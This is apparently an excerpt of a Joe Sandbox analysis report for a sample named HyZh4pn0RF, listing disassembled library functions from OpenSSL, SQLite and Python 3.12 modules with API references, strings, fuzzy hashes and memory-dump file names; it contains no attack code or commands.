Snapshot File: hcaresult_2_2_7ffbab710000_HyZh4pn0RF.jbxd

Similarity

API ID: R_newR_set_debugR_set_error
String ID: ..\s\ssl\ssl_lib.c$ssl_write_internal
API String ID: 1552677711-2859347552
Opcode ID: 4debfd64f7e5eb535d8b3e052774701b7195fb8ddc569b04f70dd0001da440ca
Instruction ID: b323fc820cee4d0b13c432f3bca2992d1413bb058751154d0f63f42c04c35f42
Opcode Fuzzy Hash: 4debfd64f7e5eb535d8b3e052774701b7195fb8ddc569b04f70dd0001da440ca
Instruction Fuzzy Hash: 424192F6A0A64282F752DB34E4812B96660EB44B84F648131EE6D03BF5CFBCE841C740

Function 00007FFBAB6A8EC3 Relevance: 19.6, APIs: 13, Instructions: 140
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FFBAB6A41E0: PyUnicode_FromStringAndSize.PYTHON312 ref: 00007FFBAB6A42E9
Part of subcall function 00007FFBAB6A41E0: PyUnicode_InternInPlace.PYTHON312 ref: 00007FFBAB6A4302

_Py_Dealloc.PYTHON312 ref: 00007FFBAB6A8F2B
_Py_Dealloc.PYTHON312 ref: 00007FFBAB6A8F63
_Py_Dealloc.PYTHON312 ref: 00007FFBAB6A8F7B
_Py_Dealloc.PYTHON312 ref: 00007FFBAB6A8F9E
_Py_Dealloc.PYTHON312 ref: 00007FFBAB6A8FC1
_Py_Dealloc.PYTHON312 ref: 00007FFBAB6A8FE4
_Py_Dealloc.PYTHON312 ref: 00007FFBAB6A9007
_Py_Dealloc.PYTHON312 ref: 00007FFBAB6A902A
_Py_Dealloc.PYTHON312 ref: 00007FFBAB6A904D
_Py_Dealloc.PYTHON312 ref: 00007FFBAB6A9070
_Py_Dealloc.PYTHON312 ref: 00007FFBAB6A9093
_Py_Dealloc.PYTHON312 ref: 00007FFBAB6A90B6
_Py_Dealloc.PYTHON312 ref: 00007FFBAB6A90D9

Memory Dump Source

Source File: 00000002.00000002.1837448997.00007FFBAB6A1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FFBAB6A0000, based on PE: true

Associated: 00000002.00000002.1837412873.00007FFBAB6A0000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837496958.00007FFBAB6B5000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837718581.00007FFBAB6BB000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837789457.00007FFBAB6BF000.00000002.00000001.01000000.0000001A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffbab6a0000_HyZh4pn0RF.jbxd

Similarity

API ID: Dealloc$Unicode_$FromInternPlaceSizeString
String ID:
API String ID: 2745024575-0
Opcode ID: 091893d1f0e79c71c802a693a5176002506af28f025ec817263c4d69333cf0a2
Instruction ID: 7768663ba53c11c741e68e640b6f84c28fe3049fa1326b4bb7edb62f291fe930
Opcode Fuzzy Hash: 091893d1f0e79c71c802a693a5176002506af28f025ec817263c4d69333cf0a2
Instruction Fuzzy Hash: C57190B5D4BA0285EE578FBCED54274B3B4AF44B94F28E838CD2D426B1DE3EA4418311

Function 00007FFBAB76EC70 Relevance: 16.0, APIs: 7, Strings: 2, Instructions: 217
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ERR_new.LIBCRYPTO-3(?,?,?,-00000031,00007FFBAB76E9C6), ref: 00007FFBAB76ED22
ERR_set_debug.LIBCRYPTO-3(?,?,?,-00000031,00007FFBAB76E9C6), ref: 00007FFBAB76ED3A

Strings

write_state_machine, xrefs: 00007FFBAB76ED2C, 00007FFBAB76F01B
..\s\ssl\statem\statem.c, xrefs: 00007FFBAB76ED33, 00007FFBAB76F022

Memory Dump Source

Source File: 00000002.00000002.1838275993.00007FFBAB711000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FFBAB710000, based on PE: true

Associated: 00000002.00000002.1838232920.00007FFBAB710000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.1838275993.00007FFBAB792000.00000020.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.1838434179.00007FFBAB794000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.1838486293.00007FFBAB7BC000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.1838524054.00007FFBAB7C1000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.1838524054.00007FFBAB7C7000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.1838524054.00007FFBAB7CF000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffbab710000_HyZh4pn0RF.jbxd

Similarity

API ID: R_newR_set_debug
String ID: ..\s\ssl\statem\statem.c$write_state_machine
API String ID: 193678381-552286378
Opcode ID: 1edee16b17f7b7a209ddbeed6cd636bdd8764bdbe6572802cc707b3b873bb90e
Instruction ID: 40900a2db95c19493cec5cb73dbc017aebc0ec8a29cc56bfa9546427b3585568
Opcode Fuzzy Hash: 1edee16b17f7b7a209ddbeed6cd636bdd8764bdbe6572802cc707b3b873bb90e
Instruction Fuzzy Hash: 4EA1B4B2A0A54286EB639F35D4643B92360FF40B48F84803AED1D47AB5DFBDE945D710

Function 00007FFBAB737DF0 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 77
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ERR_new.LIBCRYPTO-3 ref: 00007FFBAB737E20
ERR_set_debug.LIBCRYPTO-3 ref: 00007FFBAB737E38
ERR_set_error.LIBCRYPTO-3 ref: 00007FFBAB737E49

Strings

..\s\ssl\ssl_lib.c, xrefs: 00007FFBAB737E31, 00007FFBAB737EFD
ssl_read_internal, xrefs: 00007FFBAB737E25, 00007FFBAB737EF1

Memory Dump Source

Source File: 00000002.00000002.1838275993.00007FFBAB711000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FFBAB710000, based on PE: true

Associated: 00000002.00000002.1838232920.00007FFBAB710000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.1838275993.00007FFBAB792000.00000020.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.1838434179.00007FFBAB794000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.1838486293.00007FFBAB7BC000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.1838524054.00007FFBAB7C1000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.1838524054.00007FFBAB7C7000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.1838524054.00007FFBAB7CF000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffbab710000_HyZh4pn0RF.jbxd

Similarity

API ID: R_newR_set_debugR_set_error
String ID: ..\s\ssl\ssl_lib.c$ssl_read_internal
API String ID: 1552677711-1892056158
Opcode ID: b7bb0f8f0bf7d0024ae74c1eb72a6c5e298df64c6c8bd7127caa5be1f139f7e8
Instruction ID: fad96c2592c162c266ed13894c602730354085ed947c3be8f809b8ff5f322a12
Opcode Fuzzy Hash: b7bb0f8f0bf7d0024ae74c1eb72a6c5e298df64c6c8bd7127caa5be1f139f7e8
Instruction Fuzzy Hash: 09318DB2B0A68685E752DB34E8816A96350FB44B84F548035EE6D43BB6CF7CE841C601

Function 00007FFBAA602310 Relevance: 10.8, APIs: 1, Strings: 6, Instructions: 332
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memcpy.VCRUNTIME140 ref: 00007FFBAA602499

Strings

sqlite_master, xrefs: 00007FFBAA60235C
sqlite_temp_master, xrefs: 00007FFBAA602355
ase, xrefs: 00007FFBAA60259A
table, xrefs: 00007FFBAA60233A
SELECT*FROM"%w".%s ORDER BY rowid, xrefs: 00007FFBAA60268C
CREATE TABLE x(type text,name text,tbl_name text,rootpage int,sql text), xrefs: 00007FFBAA6023B4

Memory Dump Source

Source File: 00000002.00000002.1832549392.00007FFBAA581000.00000020.00000001.01000000.00000016.sdmp, Offset: 00007FFBAA580000, based on PE: true

Associated: 00000002.00000002.1832522043.00007FFBAA580000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 00000002.00000002.1832675588.00007FFBAA6AC000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 00000002.00000002.1832764653.00007FFBAA6DA000.00000004.00000001.01000000.00000016.sdmpDownload File
Associated: 00000002.00000002.1832796629.00007FFBAA6DF000.00000002.00000001.01000000.00000016.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffbaa580000_HyZh4pn0RF.jbxd

Similarity

API ID: memcpy
String ID: CREATE TABLE x(type text,name text,tbl_name text,rootpage int,sql text)$SELECT*FROM"%w".%s ORDER BY rowid$ase$sqlite_master$sqlite_temp_master$table
API String ID: 3510742995-879093740
Opcode ID: e211291552fdeeff28b77209d71417d8ca2fa6ad64ce2d5f01da26aa779ab433
Instruction ID: 287213fff172f7934f37b672f1d881503c4604235ab23e042fa70aa3ec9e1b64
Opcode Fuzzy Hash: e211291552fdeeff28b77209d71417d8ca2fa6ad64ce2d5f01da26aa779ab433
Instruction Fuzzy Hash: 87E1AFA2E0A752D6EB12CB38C8402BD77A9BF55B48F0592B1CF4C27795DF38E4928750

Function 00007FFBAB780710 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 149
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ERR_new.LIBCRYPTO-3 ref: 00007FFBAB780836
ERR_set_debug.LIBCRYPTO-3 ref: 00007FFBAB78084E
ERR_new.LIBCRYPTO-3 ref: 00007FFBAB7808CE
ERR_set_debug.LIBCRYPTO-3 ref: 00007FFBAB7808E6

Strings

..\s\ssl\statem\statem_lib.c, xrefs: 00007FFBAB780847, 00007FFBAB7808DF
tls_get_message_header, xrefs: 00007FFBAB78083B, 00007FFBAB7808D3

Memory Dump Source

Source File: 00000002.00000002.1838275993.00007FFBAB711000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FFBAB710000, based on PE: true

Associated: 00000002.00000002.1838232920.00007FFBAB710000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.1838275993.00007FFBAB792000.00000020.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.1838434179.00007FFBAB794000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.1838486293.00007FFBAB7BC000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.1838524054.00007FFBAB7C1000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.1838524054.00007FFBAB7C7000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.1838524054.00007FFBAB7CF000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffbab710000_HyZh4pn0RF.jbxd

Similarity

API ID: R_newR_set_debug
String ID: ..\s\ssl\statem\statem_lib.c$tls_get_message_header
API String ID: 193678381-2714770296
Opcode ID: 0a675c68133e8178ac648a78a03b7d1437f40432096ecb796daf1537fba5ad51
Instruction ID: 0cb5f49f707b477c41db60a8519fefeb7a25b1c74896b07154ebe1ef0b67c6f6
Opcode Fuzzy Hash: 0a675c68133e8178ac648a78a03b7d1437f40432096ecb796daf1537fba5ad51
Instruction Fuzzy Hash: 9E615BB2A0968286EBA28F71E4503B937A0FB44B48F08C036DE9D467B5DF7CE494C750

Function 00007FFBAA58DC50 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 110
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memcpy.VCRUNTIME140 ref: 00007FFBAA58DC94
memcpy.VCRUNTIME140 ref: 00007FFBAA58DCBD
ReadFile.KERNEL32 ref: 00007FFBAA58DD10
memset.VCRUNTIME140 ref: 00007FFBAA58DDD4

Strings

delayed %dms for lock/sharing conflict at line %d, xrefs: 00007FFBAA58DDA9
winRead, xrefs: 00007FFBAA58DD68

Memory Dump Source

Source File: 00000002.00000002.1832549392.00007FFBAA581000.00000020.00000001.01000000.00000016.sdmp, Offset: 00007FFBAA580000, based on PE: true

Associated: 00000002.00000002.1832522043.00007FFBAA580000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 00000002.00000002.1832675588.00007FFBAA6AC000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 00000002.00000002.1832764653.00007FFBAA6DA000.00000004.00000001.01000000.00000016.sdmpDownload File
Associated: 00000002.00000002.1832796629.00007FFBAA6DF000.00000002.00000001.01000000.00000016.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffbaa580000_HyZh4pn0RF.jbxd

Similarity

API ID: memcpy$FileReadmemset
String ID: delayed %dms for lock/sharing conflict at line %d$winRead
API String ID: 2051157613-1843600136
Opcode ID: 505e69acdbc416d286ffe42e890aa3e194485d8a64ffd5326fe3626b5f21587f
Instruction ID: 79add03363f863de2e69e6ee55b3db8cf019b3fe47056e33b8344ca92f69bb6c
Opcode Fuzzy Hash: 505e69acdbc416d286ffe42e890aa3e194485d8a64ffd5326fe3626b5f21587f
Instruction Fuzzy Hash: DA4127B3A0AA02C1E7119F39E8404A9B7E9FB49B80F401176EE4D43695DF3CE4439B54

Function 00007FFBAB72FAE0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 63
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ERR_new.LIBCRYPTO-3 ref: 00007FFBAB72FB00
ERR_set_debug.LIBCRYPTO-3 ref: 00007FFBAB72FB18
ERR_set_error.LIBCRYPTO-3 ref: 00007FFBAB72FB28
ASYNC_get_current_job.LIBCRYPTO-3 ref: 00007FFBAB72FB75

Strings

..\s\ssl\ssl_lib.c, xrefs: 00007FFBAB72FB11
SSL_do_handshake, xrefs: 00007FFBAB72FB05

Memory Dump Source

Source File: 00000002.00000002.1838275993.00007FFBAB711000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FFBAB710000, based on PE: true

Associated: 00000002.00000002.1838232920.00007FFBAB710000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.1838275993.00007FFBAB792000.00000020.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.1838434179.00007FFBAB794000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.1838486293.00007FFBAB7BC000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.1838524054.00007FFBAB7C1000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.1838524054.00007FFBAB7C7000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.1838524054.00007FFBAB7CF000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffbab710000_HyZh4pn0RF.jbxd

Similarity

API ID: C_get_current_jobR_newR_set_debugR_set_error
String ID: ..\s\ssl\ssl_lib.c$SSL_do_handshake
API String ID: 2134390360-2964568172
Opcode ID: c91630741219631a69d9c5f3432363629406958cc77146902cc34db31b5e4eda
Instruction ID: 17b14c479d34d7da8ea8a1f4818a866b29389ca14b33897f6dff477523316d16
Opcode Fuzzy Hash: c91630741219631a69d9c5f3432363629406958cc77146902cc34db31b5e4eda
Instruction Fuzzy Hash: BC21C4A7F0974682E642EB35F4512BD3361EF88784F588131EE6D06BBADF7CE5808600

Function 00007FFBAA590250 Relevance: 9.2, APIs: 1, Strings: 4, Instructions: 409fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32 ref: 00007FFBAA59048A

Part of subcall function 00007FFBAA58FC70: memset.VCRUNTIME140 ref: 00007FFBAA58FCDB
Part of subcall function 00007FFBAA58FC70: memset.VCRUNTIME140 ref: 00007FFBAA58FD63

Strings

psow, xrefs: 00007FFBAA590801
exclusive, xrefs: 00007FFBAA59041A
winOpen, xrefs: 00007FFBAA5906FD
delayed %dms for lock/sharing conflict at line %d, xrefs: 00007FFBAA590566

Memory Dump Source

Source File: 00000002.00000002.1832549392.00007FFBAA581000.00000020.00000001.01000000.00000016.sdmp, Offset: 00007FFBAA580000, based on PE: true

Associated: 00000002.00000002.1832522043.00007FFBAA580000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 00000002.00000002.1832675588.00007FFBAA6AC000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 00000002.00000002.1832764653.00007FFBAA6DA000.00000004.00000001.01000000.00000016.sdmpDownload File
Associated: 00000002.00000002.1832796629.00007FFBAA6DF000.00000002.00000001.01000000.00000016.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffbaa580000_HyZh4pn0RF.jbxd

Similarity

API ID: memset$CreateFile
String ID: delayed %dms for lock/sharing conflict at line %d$exclusive$psow$winOpen
API String ID: 333288564-3829269058
Opcode ID: 47d229aef933e0d59dc5dcf9258cd0e2023164957fffc33a8fb9dfcd5c4bd0d1
Instruction ID: 0b5221049455af020749d2f9899060ee30475594400883d29ae09234636157f6
Opcode Fuzzy Hash: 47d229aef933e0d59dc5dcf9258cd0e2023164957fffc33a8fb9dfcd5c4bd0d1
Instruction Fuzzy Hash: 9802E5A1A0EA42C6FB968F79E88027D33E8FF95B94F041575DD4D066A0DF3CE4469B20

Function 00007FFBAA5B7E80 Relevance: 9.1, APIs: 1, Strings: 5, Instructions: 139COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140 ref: 00007FFBAA5B8019

Strings

misuse, xrefs: 00007FFBAA5B7ED5
2d3a40c05c49e1a49264912b1a05bc2143ac0e7c3df588276ce80a4cbc9bd1b0, xrefs: 00007FFBAA5B7EC8
API called with NULL prepared statement, xrefs: 00007FFBAA5B7E94
%s at line %d of [%.10s], xrefs: 00007FFBAA5B7EE1
API called with finalized prepared statement, xrefs: 00007FFBAA5B7EAA

Memory Dump Source

Source File: 00000002.00000002.1832549392.00007FFBAA581000.00000020.00000001.01000000.00000016.sdmp, Offset: 00007FFBAA580000, based on PE: true

Associated: 00000002.00000002.1832522043.00007FFBAA580000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 00000002.00000002.1832675588.00007FFBAA6AC000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 00000002.00000002.1832764653.00007FFBAA6DA000.00000004.00000001.01000000.00000016.sdmpDownload File
Associated: 00000002.00000002.1832796629.00007FFBAA6DF000.00000002.00000001.01000000.00000016.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffbaa580000_HyZh4pn0RF.jbxd

Similarity

API ID: memcpy
String ID: %s at line %d of [%.10s]$2d3a40c05c49e1a49264912b1a05bc2143ac0e7c3df588276ce80a4cbc9bd1b0$API called with NULL prepared statement$API called with finalized prepared statement$misuse
API String ID: 3510742995-3712603878
Opcode ID: bd5a30be7f2f2b4ec66f19732ede60e8cd1cfc78c1b4ac1a2368ec9ef04a4963
Instruction ID: 7eeb24423b72a70b050202955121394b811e2665f2ae260191694e7df9788541
Opcode Fuzzy Hash: bd5a30be7f2f2b4ec66f19732ede60e8cd1cfc78c1b4ac1a2368ec9ef04a4963
Instruction Fuzzy Hash: 8951B0A1A0FA82C5FB169B75D4002B87399AF46B91F0851B1DE5D0B7D5EF3CE8438328

Function 00007FFBAA599E80 Relevance: 6.2, APIs: 1, Strings: 3, Instructions: 174COMMON

Download Yara Rule

Strings

2d3a40c05c49e1a49264912b1a05bc2143ac0e7c3df588276ce80a4cbc9bd1b0, xrefs: 00007FFBAA599EA2, 00007FFBAA599FF8
%s at line %d of [%.10s], xrefs: 00007FFBAA599EC2, 00007FFBAA59A018
database corruption, xrefs: 00007FFBAA599EBB, 00007FFBAA59A011

Memory Dump Source

Source File: 00000002.00000002.1832549392.00007FFBAA581000.00000020.00000001.01000000.00000016.sdmp, Offset: 00007FFBAA580000, based on PE: true

Associated: 00000002.00000002.1832522043.00007FFBAA580000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 00000002.00000002.1832675588.00007FFBAA6AC000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 00000002.00000002.1832764653.00007FFBAA6DA000.00000004.00000001.01000000.00000016.sdmpDownload File
Associated: 00000002.00000002.1832796629.00007FFBAA6DF000.00000002.00000001.01000000.00000016.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffbaa580000_HyZh4pn0RF.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$2d3a40c05c49e1a49264912b1a05bc2143ac0e7c3df588276ce80a4cbc9bd1b0$database corruption
API String ID: 0-3418467682
Opcode ID: 70763ae1427885678d87873981513cb12e4759df12c4f2b9939fb91df184ef28
Instruction ID: 06d5fa3af445ae383a8afe1f6bcedafcb75b1260627623192ca406827853e632
Opcode Fuzzy Hash: 70763ae1427885678d87873981513cb12e4759df12c4f2b9939fb91df184ef28
Instruction Fuzzy Hash: 187163A2A0A642C5FA638B35D88037DB7A9EB45B84F145075CE4D4B6A5DF3DE443C324

Function 00007FFBAB6B252E Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 26COMMON

Download Yara Rule

APIs

_Py_Dealloc.PYTHON312 ref: 00007FFBAB6B253D

Strings

<module>, xrefs: 00007FFBAB6B3822

Memory Dump Source

Source File: 00000002.00000002.1837448997.00007FFBAB6A1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FFBAB6A0000, based on PE: true

Associated: 00000002.00000002.1837412873.00007FFBAB6A0000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837496958.00007FFBAB6B5000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837718581.00007FFBAB6BB000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837789457.00007FFBAB6BF000.00000002.00000001.01000000.0000001A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffbab6a0000_HyZh4pn0RF.jbxd

Similarity

API ID: Dealloc
String ID: <module>
API String ID: 3617616757-217463007
Opcode ID: 3d0b5fe31bdceefd0d16471987016516823057e139ed2a49c540c935358a7bd8
Instruction ID: 06db31f64e8f2c8602c694541d548a67c02c65bd004feb0ba264b2458f102306
Opcode Fuzzy Hash: 3d0b5fe31bdceefd0d16471987016516823057e139ed2a49c540c935358a7bd8
Instruction Fuzzy Hash: A6F01DE6E8B91241EE079BADEC104B4E2B06F44B90F40F435CD3D132B0DF2CA5418700

Function 00007FFBAA585CA5 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 17COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFBAA585CB0

Strings

failed to allocate %u bytes of memory, xrefs: 00007FFBAA585CC1

Memory Dump Source

Source File: 00000002.00000002.1832549392.00007FFBAA581000.00000020.00000001.01000000.00000016.sdmp, Offset: 00007FFBAA580000, based on PE: true

Associated: 00000002.00000002.1832522043.00007FFBAA580000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 00000002.00000002.1832675588.00007FFBAA6AC000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 00000002.00000002.1832764653.00007FFBAA6DA000.00000004.00000001.01000000.00000016.sdmpDownload File
Associated: 00000002.00000002.1832796629.00007FFBAA6DF000.00000002.00000001.01000000.00000016.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffbaa580000_HyZh4pn0RF.jbxd

Similarity

API ID: malloc
String ID: failed to allocate %u bytes of memory
API String ID: 2803490479-1168259600
Opcode ID: eae34deaae7969ea28b4ca2f60ea221ca673c3b154fb3434b24edb7836ccbe96
Instruction ID: 5abf0d3a45d4e8b69d9ad2536cf6ed8272ef7a1c70afd5d570c456a9f4887f90
Opcode Fuzzy Hash: eae34deaae7969ea28b4ca2f60ea221ca673c3b154fb3434b24edb7836ccbe96
Instruction Fuzzy Hash: 28D0CD51B0E501C1FF564BA9F9804746360AF4CFC0B045074CE0D47755DE1CE042CB40

Function 00007FFBAB711D43 Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

BIO_ctrl.LIBCRYPTO-3 ref: 00007FFBAB76EC36

Memory Dump Source

Source File: 00000002.00000002.1838275993.00007FFBAB711000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FFBAB710000, based on PE: true

Associated: 00000002.00000002.1838232920.00007FFBAB710000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.1838275993.00007FFBAB792000.00000020.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.1838434179.00007FFBAB794000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.1838486293.00007FFBAB7BC000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.1838524054.00007FFBAB7C1000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.1838524054.00007FFBAB7C7000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.1838524054.00007FFBAB7CF000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffbab710000_HyZh4pn0RF.jbxd

Similarity

API ID: O_ctrl
String ID:
API String ID: 3605655398-0
Opcode ID: bfe36b7522bdb383b583256963e0cb7d483da4068be122a2aa8aa4264da1dd87
Instruction ID: 6d9f2982fe6cba95d832c8d286c8bdd1df3004f746012cd47e0c6b9da95ad357
Opcode Fuzzy Hash: bfe36b7522bdb383b583256963e0cb7d483da4068be122a2aa8aa4264da1dd87
Instruction Fuzzy Hash: 60E0D8F2F0200246F7125775D446BB81290EB48714F944030EE1C866F2F6EDD8E28710

Function 00007FFBAB71EE30 Relevance: 1.3, APIs: 1, Instructions: 60COMMON

Download Yara Rule

APIs

SetLastError.KERNEL32 ref: 00007FFBAB71EE61

Memory Dump Source

Source File: 00000002.00000002.1838275993.00007FFBAB711000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FFBAB710000, based on PE: true

Associated: 00000002.00000002.1838232920.00007FFBAB710000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.1838275993.00007FFBAB792000.00000020.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.1838434179.00007FFBAB794000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.1838486293.00007FFBAB7BC000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.1838524054.00007FFBAB7C1000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.1838524054.00007FFBAB7C7000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.1838524054.00007FFBAB7CF000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffbab710000_HyZh4pn0RF.jbxd

Similarity

API ID: ErrorLast
String ID:
API String ID: 1452528299-0
Opcode ID: d29a44c3b10b43c9c66d24f2e9978454315fcbd019f87c95ebe5899c13090e1b
Instruction ID: 32fc3e7150fe1973f323c6fd9fb60def38f1d40eb6361c99500a9099205647e5
Opcode Fuzzy Hash: d29a44c3b10b43c9c66d24f2e9978454315fcbd019f87c95ebe5899c13090e1b
Instruction Fuzzy Hash: 3E216D7260878087E354DF22F58026AB3A5FB88B94F548126EF9807FB9CF78D555CB00

Non-executed Functions

Function 00007FFBAA4618A0 Relevance: 13.9, APIs: 9, Instructions: 424COMMON

Download Yara Rule

APIs

PyMem_Malloc.PYTHON312 ref: 00007FFBAA461903
PyType_IsSubtype.PYTHON312 ref: 00007FFBAA4619F6
PyType_IsSubtype.PYTHON312 ref: 00007FFBAA461A53
PyUnicode_FromKindAndData.PYTHON312 ref: 00007FFBAA461B24
PyMem_Free.PYTHON312 ref: 00007FFBAA461B32
PyMem_Realloc.PYTHON312 ref: 00007FFBAA461C18
PyMem_Free.PYTHON312 ref: 00007FFBAA463A31
PyErr_NoMemory.PYTHON312 ref: 00007FFBAA463A37

Memory Dump Source

Source File: 00000002.00000002.1831536690.00007FFBAA461000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FFBAA460000, based on PE: true

Associated: 00000002.00000002.1831396691.00007FFBAA460000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000002.00000002.1831575053.00007FFBAA465000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000002.00000002.1831575053.00007FFBAA4C2000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000002.00000002.1831575053.00007FFBAA50E000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000002.00000002.1831575053.00007FFBAA512000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000002.00000002.1831575053.00007FFBAA517000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000002.00000002.1831575053.00007FFBAA56F000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000002.00000002.1832420063.00007FFBAA572000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000002.00000002.1832455166.00007FFBAA574000.00000002.00000001.01000000.0000001B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffbaa460000_HyZh4pn0RF.jbxd

Similarity

API ID: Mem_$FreeSubtypeType_$DataErr_FromKindMallocMemoryReallocUnicode_
String ID:
API String ID: 3719493655-0
